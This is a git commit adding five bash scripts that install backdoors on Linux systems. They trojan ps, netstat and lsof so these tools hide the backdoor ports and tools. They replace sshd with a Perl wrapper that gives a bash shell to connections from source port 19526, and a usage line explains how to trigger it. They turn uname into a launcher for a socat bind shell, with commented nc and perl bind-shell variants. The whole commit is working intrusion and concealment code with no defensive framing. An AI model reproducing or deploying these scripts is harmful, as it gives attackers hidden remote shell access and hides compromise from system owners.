Initial upload

2017-11-20 21:04:16 +03:00 · 2017-11-20 21:04:16 +03:00 · b8d0052ed5
parent e6a1c1c459
commit b8d0052ed5
5 changed files with 148 additions and 0 deletions
--- a/bd_hide.sh
+++ b/bd_hide.sh
@ -0,0 +1,34 @@
+#!/bin/bash
+
+#ps
+#------------------------
+touch /usr/local/bin/ps
+
+cat <<EOF >> /usr/local/bin/ps	
+#!/bin/bash
+/bin/ps \$@ | grep -Ev '4444|3177|1177|1337|19526|socat|LEGO|nc|perl'
+EOF
+
+chmod +x /usr/local/bin/ps
+
+#netstat
+#------------------------
+touch /usr/local/bin/netstat
+
+cat <<EOF >> /usr/local/bin/netstat
+#!/bin/bash
+/bin/netstat \$@ | grep -Ev '4444|3177|1177|1337|19526|socat|LEGO|nc|perl'
+EOF
+
+chmod +x /usr/local/bin/netstat
+
+#lsof
+#------------------------
+touch /usr/local/bin/lsof
+
+cat <<EOF >> /usr/local/bin/lsof
+#!/bin/bash
+/usr/bin/lsof \$@ | grep -Ev '4444|3177|1177|1337|19526|socat|LEGO|nc|perl'
+EOF
+
+chmod +x /usr/local/bin/lsof
--- a/bd_hide_c.sh
+++ b/bd_hide_c.sh
@ -0,0 +1,51 @@
+#!/bin/bash
+
+#netstat
+#------------------------
+touch /tmp/.netstat.c
+
+cat <<EOF >> /tmp/.netstat.c
+int main(int a,char**b){
+  char*c[999999]={"sh","-c","/bin/netstat \$*|grep -Ev '4444|3177|1177|1337|19526|socat|LEGO|nc|perl'"};
+  memcpy(c+3,b,8*a);
+  execv("/bin/sh",c);
+}
+EOF
+
+gcc -xc /tmp/.netstat.c -o /usr/local/bin/netstat
+
+rm /tmp/.netstat.c
+
+
+#ps
+#------------------------
+touch /tmp/.ps.c
+
+cat <<EOF >> /tmp/.ps.c
+int main(int a,char**b){
+  char*c[999999]={"sh","-c","/bin/ps \$*|grep -Ev '4444|3177|1177|1337|19526|socat|LEGO|nc|perl'"};
+  memcpy(c+3,b,8*a);
+  execv("/bin/sh",c);
+}
+EOF
+
+gcc -xc /tmp/.ps.c -o /usr/local/bin/ps
+
+rm /tmp/.ps.c
+
+
+#lsof
+#------------------------
+touch /tmp/.lsof.c
+
+cat <<EOF >> /tmp/.lsof.c
+int main(int a,char**b){
+  char*c[999999]={"sh","-c","/usr/bin/lsof \$*|grep -Ev '4444|3177|1177|1337|19526|socat|LEGO|nc|perl'"};
+  memcpy(c+3,b,8*a);
+  execv("/bin/sh",c);
+}
+EOF
+
+gcc -xc /tmp/.lsof.c -o /usr/local/bin/lsof
+
+rm /tmp/.lsof.c
--- a/bd_sshd.sh
+++ b/bd_sshd.sh
@ -0,0 +1,18 @@
+#!/bin/bash
+
+#sshd
+#-------------------------
+mv /usr/sbin/sshd /usr/bin/
+touch /usr/sbin/sshd
+
+cat <<EOF >> /usr/sbin/sshd
+#!/usr/bin/perl
+exec"/bin/bash"if(getpeername(STDIN)=~/^..LF/);
+exec{"/usr/bin/sshd"}"/usr/sbin/sshd",@ARGV;
+EOF
+
+chmod +x /usr/sbin/sshd
+service sshd restart
+
+#usage
+#socat STDIO TCP4:<target ip>:22,sourceport=19526
--- a/bd_uname.sh
+++ b/bd_uname.sh
@ -0,0 +1,14 @@
+#uname
+#-------------------------
+touch /usr/local/bin/uname
+
+cat <<EOF >> /usr/local/bin/uname
+#!/bin/bash
+#nc.traditional -l -v -p 4444 -e /bin/bash 2>/dev/null &
+#socat TCP4-Listen:3177,fork EXEC:/bin/bash 2>/dev/null &
+socat SCTP-Listen:1177,fork EXEC:/bin/bash 2>/dev/null &
+#perl -MIO -e'$s=new IO::Socket::INET(LocalPort=>1337,Listen=>1);while($c=$s->accept()){$_=<$c>;print $c `$_`;}' 2>/dev/null &
+/bin/uname \$@
+EOF
+
+chmod +x /usr/local/bin/uname
--- a/bd_uname_c.sh
+++ b/bd_uname_c.sh
@ -0,0 +1,31 @@
+#!/bin/bash
+
+#uname
+#------------------------
+touch /tmp/.uname.c
+
+cat <<EOF >> /tmp/.uname.c
+
+#include <sys/types.h>
+
+int main(int a,char**b){
+  pid_t child_pid = fork();
+  if(child_pid == 0) {
+    /* char*d[999999]={"sh","-c","nc.traditional -l -v -p 4444 -e /bin/bash 2>/dev/null &"}; */
+    /* char*d[999999]={"sh","-c","socat TCP4-Listen:3177,fork EXEC:/bin/bash 2>/dev/null &"}; */
+    char*d[999999]={"sh","-c","socat SCTP-Listen:1177,fork EXEC:/bin/bash 2>/dev/null &"};
+    /* char*d[999999]={"sh","-c","perl -MIO -e'$s=new IO::Socket::INET(LocalPort=>1337,Listen=>1);while($c=$s->accept()){$_=<$c>;print $c `$_`;}' 2>/dev/null &"}; */
+    execv("/bin/sh",d);
+    exit(0);
+  }
+  else {
+    char*c[999999]={"sh","-c","/bin/uname \$*"};
+    memcpy(c+3,b,8*a);
+    execv("/bin/sh",c);
+  }
+}
+EOF
+
+gcc -xc /tmp/.uname.c -o /usr/local/bin/uname
+
+rm /tmp/.uname.c